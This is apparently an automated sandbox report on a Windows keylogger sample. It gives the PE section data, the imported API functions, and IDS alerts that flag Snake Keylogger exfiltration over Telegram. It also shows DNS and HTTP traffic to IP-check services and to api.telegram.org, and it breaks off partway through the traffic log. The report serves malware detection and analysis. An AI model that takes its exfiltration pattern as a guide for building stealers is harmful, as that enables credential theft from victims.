                                                                              • [RES] VS2012 UPD4 build 61030
                                                                              • [LNK] VS2012 UPD4 build 61030
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x28180.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xed0000x6c4c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xc40000x281800x2820092510354b5d2933ed301fb8fc1b448a7False0.8364851051401869data7.6469202419063835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xed0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                              RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                              RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xcc7b80x1f487data1.0003589963710149
                                                                              RT_GROUP_ICON0xebc400x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0xebcb80x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0xebccc0x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0xebce00x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0xebcf40xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0xebdd00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                              DLLImport
                                                                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-10T15:34:57.854468+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049707193.122.130.080TCP
                                                                              2025-01-10T15:35:04.229590+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049707193.122.130.080TCP
                                                                              2025-01-10T15:35:04.863572+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049749149.154.167.220443TCP
                                                                              2025-01-10T15:35:05.169737+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049749149.154.167.220443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 15:34:56.499233007 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:56.504077911 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:56.504148006 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:56.504489899 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:56.509285927 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.646761894 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.647392035 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.647450924 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:57.647850037 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.647936106 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:57.651542902 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:57.656339884 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.808482885 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:34:57.854468107 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:34:57.858834982 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:57.858879089 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:57.858980894 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:57.863748074 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:57.863765955 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.325387001 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.325522900 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:58.331192970 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:58.331202984 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.331582069 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.386305094 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:58.495558977 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:58.539357901 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.610132933 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.610208035 CET44349708104.21.80.1192.168.2.10
                                                                              Jan 10, 2025 15:34:58.610351086 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:34:58.676774025 CET49708443192.168.2.10104.21.80.1
                                                                              Jan 10, 2025 15:35:03.973011017 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:35:03.980052948 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:35:04.181526899 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:35:04.194597960 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.194636106 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.194700003 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.195611954 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.195626974 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.229589939 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:35:04.816788912 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.817024946 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.818891048 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.818907022 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.819449902 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.821490049 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.863369942 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:04.863456011 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:04.863471985 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:05.169810057 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:05.170001984 CET44349749149.154.167.220192.168.2.10
                                                                              Jan 10, 2025 15:35:05.170068026 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:35:05.170478106 CET49749443192.168.2.10149.154.167.220
                                                                              Jan 10, 2025 15:36:09.183299065 CET8049707193.122.130.0192.168.2.10
                                                                              Jan 10, 2025 15:36:09.183420897 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:36:38.652848005 CET4970780192.168.2.10193.122.130.0
                                                                              Jan 10, 2025 15:36:38.657875061 CET8049707193.122.130.0192.168.2.10
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 15:34:56.482534885 CET6176653192.168.2.101.1.1.1
                                                                              Jan 10, 2025 15:34:56.490092993 CET53617661.1.1.1192.168.2.10
                                                                              Jan 10, 2025 15:34:57.850575924 CET5594253192.168.2.101.1.1.1
                                                                              Jan 10, 2025 15:34:57.858136892 CET53559421.1.1.1192.168.2.10
                                                                              Jan 10, 2025 15:35:04.186198950 CET5038553192.168.2.101.1.1.1
                                                                              Jan 10, 2025 15:35:04.193684101 CET53503851.1.1.1192.168.2.10
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 15:34:56.482534885 CET192.168.2.101.1.1.10x1c01Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.850575924 CET192.168.2.101.1.1.10x896cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:35:04.186198950 CET192.168.2.101.1.1.10x3f2dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:56.490092993 CET1.1.1.1192.168.2.100x1c01No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:34:57.858136892 CET1.1.1.1192.168.2.100x896cNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 15:35:04.193684101 CET1.1.1.1192.168.2.100x3f2dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049707193.122.130.0807336C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 15:34:56.504489899 CET151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Jan 10, 2025 15:34:57.646761894 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:34:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: ccc99e180d301372d6c49292de558d2a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Jan 10, 2025 15:34:57.647392035 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:34:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: ccc99e180d301372d6c49292de558d2a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Jan 10, 2025 15:34:57.647850037 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:34:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: ccc99e180d301372d6c49292de558d2a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Jan 10, 2025 15:34:57.651542902 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jan 10, 2025 15:34:57.808482885 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:34:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: e685344e37b9f42f7b654cf652c400c8
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Jan 10, 2025 15:35:03.973011017 CET127OUTGET / HTTP/1.1
